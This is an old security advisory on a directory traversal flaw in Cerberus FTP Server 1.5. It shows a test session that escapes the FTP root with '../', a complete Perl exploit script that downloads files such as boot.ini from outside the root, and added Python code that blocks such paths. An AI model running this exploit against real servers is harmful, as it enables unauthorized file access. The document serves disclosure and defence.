
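Cerberus FTP Server Directory Traversal Vulnerability


Published: 2001-08-22
Updated: 2001-08-22
Severity:
Threat: Remote unauthorized file access
Error type: Input validation error
Exploitation method: Server mode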

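Affected systems
Cerberus FTP Server version 1.5
Description
Cerberus FTP (http://www.greenepa.net/~averett/cerberus.htm) is a
multithreaded FTP server for Windows that uses little CPU and memory.
It contains a security vulnerability that allows an attacker to bypass
the FTP root directory restriction.

Test code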
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Benutzer (192.168.0.2:(none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection

#!/usr/bin/perl

# this exploit will download files from
# the ftp server, even if they are outside of
# root directory.

use Net::FTP;

$loginname='anonymous';
$passwd='';

$dirname= '';

print "\n-----------------------------------\n";
print "Cerberus Ftp server 1.5\n";
print "directory traversal exploit\n";
print "by Christoph Heindl\n";
print "se00020\@fhs-hagenberg.ac.at\n";
print "-----------------------------------\n";
if (!$ARGV[0] || !$ARGV[1]){
print "usage: cftpsploit.pl <host> <dir/file>\n";
print " example: cftpsploit.pl 192.168.0.2 boot.ini\n";
print " will download boot.ini from c:\\ if server is running on drive c\n";
exit;
}

$ipaddr=$ARGV[0];
$ftp=Net::FTP->new($ipaddr, Timeout=>5);
if (!$ftp->login($loginname, $passwd)){
die "\ncould not login\n";
}

print "searching for directory...";
foreach $dir ($ftp->ls()) {
next unless ($ftp->cwd($dir));
$dirname=$dir;
$ftp->cwd('..');
}
if ($dirname eq '') {
print "failed\n";
print "trying to create pseudo dir...";
$mkd=$ftp->mkdir('pseudo');
if ($mkd) {
  print "ok\n";
  $dirname="pseudo";
}
else {
  print "failed\n";
  print "exiting...\n";
  exit(0);
}
}
print "found dir\n";
print "dirname is: ".$dirname."\n";
$pathtofile=$dirname."/../../";
print "getting file...\n";
$ftp->get($pathtofile.$ARGV[1]);
$ftp->quit;
print "all done. file located in current dir";

Solution
None yet
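
The traversal in the test session (`cd delphiown/../../`) is stopped when the server resolves every client path against a virtual root before touching the disk. The following is an added example, not code from the advisory or from Cerberus FTP; the function names, the `PathEscape` exception and the reply texts are assumptions made for illustration.

```python
import os

class PathEscape(Exception):
    """A client-supplied path would leave the FTP root."""

def resolve_virtual(cwd, arg):
    """Resolve FTP argument `arg` against the virtual directory `cwd`.

    Both are '/'-rooted paths relative to the FTP root. Returns the
    normalized virtual path or raises PathEscape.
    """
    if "\x00" in arg:
        raise PathEscape("NUL byte in path")
    arg = arg.replace("\\", "/")  # Windows accepts both separators
    parts = [] if arg.startswith("/") else [p for p in cwd.split("/") if p]
    for comp in arg.split("/"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:  # already at the root: refuse, do not clamp silently
                raise PathEscape("'..' above FTP root")
            parts.pop()
        elif ":" in comp or comp != comp.rstrip(". "):
            # drive letters, NTFS streams, and names Windows would rewrite
            # by stripping trailing dots/spaces (e.g. ".. ")
            raise PathEscape("unsafe component: %r" % comp)
        else:
            parts.append(comp)
    return "/" + "/".join(parts)

def to_real(root, vpath):
    """Map a normalized virtual path to disk, then re-check containment after
    the OS resolves links, so a link inside the root cannot point outside."""
    root_real = os.path.realpath(root)
    real = os.path.realpath(os.path.join(root_real, *vpath.strip("/").split("/")))
    if os.path.commonpath([root_real, real]) != root_real:
        raise PathEscape("resolved path outside FTP root")
    return real

def handle_cwd(root, cwd, arg):
    """Return (reply, new_cwd) for a CWD command; constructed reply texts."""
    try:
        vpath = resolve_virtual(cwd, arg)
        if not os.path.isdir(to_real(root, vpath)):
            return "550 No such directory", cwd
        return "250 Change directory ok", vpath
    except PathEscape:
        return "550 Permission denied", cwd
```

The same `resolve_virtual` and `to_real` pair belongs in front of every command that takes a path (RETR, STOR, LIST, MKD), not only CWD.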

Related information
Christoph.Heindl at fhs-hagenberg.ac.at